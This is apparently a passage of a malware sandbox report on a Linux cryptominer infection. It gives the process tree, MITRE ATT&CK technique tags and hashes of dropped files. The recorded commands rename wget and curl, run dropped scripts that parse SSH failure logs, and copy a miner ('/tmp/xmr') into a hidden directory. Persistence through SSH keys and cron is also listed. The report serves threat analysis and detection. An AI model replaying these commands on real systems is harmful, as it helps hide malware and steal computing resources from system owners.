/usr/bin/getentgetent passwd 03⤵PID:1826
-
-
-
/usr/bin/mvmv /usr/bin/wget /usr/bin/wget11⤵PID:1747
-
/usr/bin/mvmv /usr/bin/curl /usr/bin/curl11⤵PID:1749
-
/tmp/secure.sh/tmp/secure.sh1⤵
- Executes dropped EXE
PID:1761 -
/usr/bin/datedate "+%b %e %H"2⤵PID:1766
-
-
/usr/bin/grepgrep "Dec 3 23" /var/log/secure2⤵PID:1771
-
-
/usr/bin/grepgrep Failed2⤵PID:1772
-
-
/usr/bin/awkawk "{print \$(NF-3)}"2⤵PID:1773
-
-
/usr/bin/sortsort2⤵PID:1774
-
-
/usr/bin/uniquniq -c2⤵PID:1775
-
-
/usr/bin/awkawk "\$1>\"\$LIMIT\"{print \$1\":\"\$2}"2⤵PID:1776
-
-
/usr/bin/sleepsleep 602⤵PID:1780
-
-
/tmp/auth.sh/tmp/auth.sh1⤵
- Executes dropped EXE
PID:1769 -
/usr/bin/datedate "+%b %e %H"2⤵PID:1778
-
-
/usr/bin/grepgrep "Dec 3 23" /var/log/auth.log2⤵PID:1784
-
-
/usr/bin/grepgrep Failed2⤵PID:1785
-
-
/usr/bin/awkawk "{print \$(NF-3)}"2⤵PID:1786
-
-
/usr/bin/sortsort2⤵PID:1787
-
-
/usr/bin/uniquniq -c2⤵PID:1788
-
-
/usr/bin/awkawk "\$1>\"\$LIMIT\"{print \$1\":\"\$2}"2⤵PID:1789
-
-
/usr/bin/sleepsleep 602⤵PID:1792
-
-
/usr/bin/cpcp -R /tmp/auth.sh /tmp/config.json /tmp/gdm3-config-err-n2WIav /tmp/secure.sh /tmp/snap-private-tmp /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-ModemManager.service-Ai7PQj /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-colord.service-VsmpfT /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-power-profiles-daemon.service-W9pYGd /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-switcheroo-control.service-Rt2zVp /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-logind.service-O0OsZo /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-oomd.service-w523zw /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-resolved.service-WXhxau /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-systemd-timedated.service-ECrg2q /tmp/systemd-private-286e069599fe4ee4b357218f47fe4dfd-upower.service-1vj6Ar /tmp/work32 /tmp/xmr /usr/.work/1⤵PID:1782
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1SSH Authorized Keys
1Scheduled Task/Job
1Cron
1Privilege Escalation
Account Manipulation
1SSH Authorized Keys
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
2System Checks
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
419B
MD5ed583c5e843c91d8fd0752e56ccacbde
SHA129ded7c69c93262842b8793d3a99868d8118364e
SHA256442e897c78532dd4e36fa1c7fd791c4bcf19b230d9aab3d5d12ade2d98b84a83
SHA512057e123d626a9cc2d5181707169e3636844856db721cd34d181712a16724538df4360d054af87b1b58505b78702fdce57836d340bab8af56c5173e9c0c735a5f
-
Filesize
1KB
MD52a669d95673bc6d238399132dcf52e61
SHA17497b198b549a139b3c32bffa65c3e15885b0ff2
SHA256b1a4c0d08ad2b8625e5a111ff70d88d0bcf4f7d712b5e7ab72747622431df18f
SHA512152285fd8f28c8dafd0dd3f2320b3258cbb6b621707de7486efdee710c7dcbb87fb716b181d3b4b1ac73376a3b4cb618d56d6a90213c5cbfa77a853fe9b60233
-
Filesize
417B
MD5b2c87016390044ebd32dcb8c52dfd8f3
SHA15a246aa26f208d4c3d9f512e0f1777bc51cae68e
SHA256904f2c1bc6b48ba663b9186b7b04905a33af3d55afb9995802daadab83da2a15
SHA5129375bc9e0c0049baac8247a58526cc727e8452ec831e7abd39864a2de549cb36136ba2ff154428e2a9370ec7adfeda63d6d9bd9fa7158fc5eae852f8b035173e
-
Filesize
1.2MB
MD520552242cd4b5e8fa6071951e9f4bf6d
SHA195f8891ab0169ee8c51c39de0d3f0b974091e8fa
SHA25686f0e4c7596a7ac30af4152ce86268b109c325f62a7cfe1be0dbc72de0d9279a
SHA5121637b6742045baa9f8f16dbe5afa535324dec97abc3c5d37679c2ccca30f842ea80cbecb315925bcfce20f84dfdef4a7a978dc1986f26b9f9698665ef30e1c3a
-
Filesize
4.2MB
MD506e1f988471336d788da0fcaa29ed50b
SHA12fa461cd8f0614dfb86f845aef47c42910370b00
SHA2567f28b2791ad94a202eea5e4c91d47cdeadca4723723427af574519f8aedbf15e
SHA5124ed849872ad844df311fa5e80246b143d76c1b0a432e9d38771e8a66fa42f71a683b52e41a8e3fbdd090152088c96176bdf6820478ceb5b5ab9f77284336b180
-
Filesize
34B
MD5421de1a0dc2f268bd3aa5f563eff3901
SHA1eadf89c04673ae58d44bc8d02471c0fbf66e747e
SHA256888cf94f41403c7181b3ee7afb94278246f57b2d1b3cf078853d6ef447c2379a
SHA5127285223424cd7cebb5246c5f4410d4f43da83be4ed1870c9adcec58d6c650bb4d0044f806b99514f2651818cbc406479760747fcfe03c33b315d4f9a4b52d4b5